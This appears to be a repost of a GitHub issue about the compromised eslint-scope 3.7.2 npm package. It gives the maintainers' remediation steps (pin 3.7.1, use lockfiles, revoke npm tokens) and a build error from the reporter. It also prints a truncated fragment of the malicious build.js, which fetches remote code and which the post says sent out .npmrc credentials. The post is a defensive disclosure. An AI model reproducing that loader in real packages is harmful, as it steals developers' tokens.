Virus in eslint-scope 3.7.2

I came across this issue and figured I'd share it here.

Virus in eslint-scope? #39

pronebird commented on Jul 12, 2018

Update from the maintainers

Incident status report from npm

Please follow the comment by @platinumazure that gives a little insight into what happened:

It also appears that the same code was published in eslint-config-eslint@5.0.2, which has also since been unpublished. See for more information.

In the meantime

  1. Pin the version of eslint-scope to 3.7.1. One way is to add the resolutions to your package.json:

         "resolutions": {
           "eslint-scope": "3.7.1"
         }

     Verify the dependency version with yarn list eslint-scope. It should print out eslint-scope@3.7.1.

  2. Use package-lock.json or yarn.lock and have it in your repo if possible. Do not upgrade to 3.7.2 even if yarn outdated shows that there is a new version available.

  3. Revoke your NPM token as suggested in the comment below. You can do the same by logging in to, selecting the "tokens" menu from the account dropdown and removing all tokens listed on the page. Make sure to recreate the relevant tokens if you hook your NPM to external services.

The issue

I don't know what the hell this is but it looks like a virus to me:

    [2/3] β   eslint-scope
    error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
    Exit code: 1
    Command: node ./lib/build.js
    Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope

    SyntaxError: Unexpected end of input
        at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
        at emitOne (events.js:116:13)
        at IncomingMessage.emit (events.js:211:7)
        at (_stream_readable.js:475:10)
        at flow (_stream_readable.js:846:34)
        at resume_ (_stream_readable.js:828:3)
        at _combinedTickCallback (internal/process/next_tick.js:138:11)

The contents of a suspicious file:

    var https=require('https');
    https.get({'hostname':'',path:'/raw/XLeVP82h',headers:{'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',Accept:'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}},(r)=>{

The URL it attempts to load is

Also it attempts to send my .npmrc somewhere.

This is version 3.7.2 that's been published an hour ago.

Package managers are a surprising medium to spread viruses, especially when the virus is latched onto a dependency of babel-eslint 😱


Not exactly a virus but an exfiltration tool

Mac Siri
I'm a refactor-loving developer and I promise you I have nothing to do with Apple's Siri.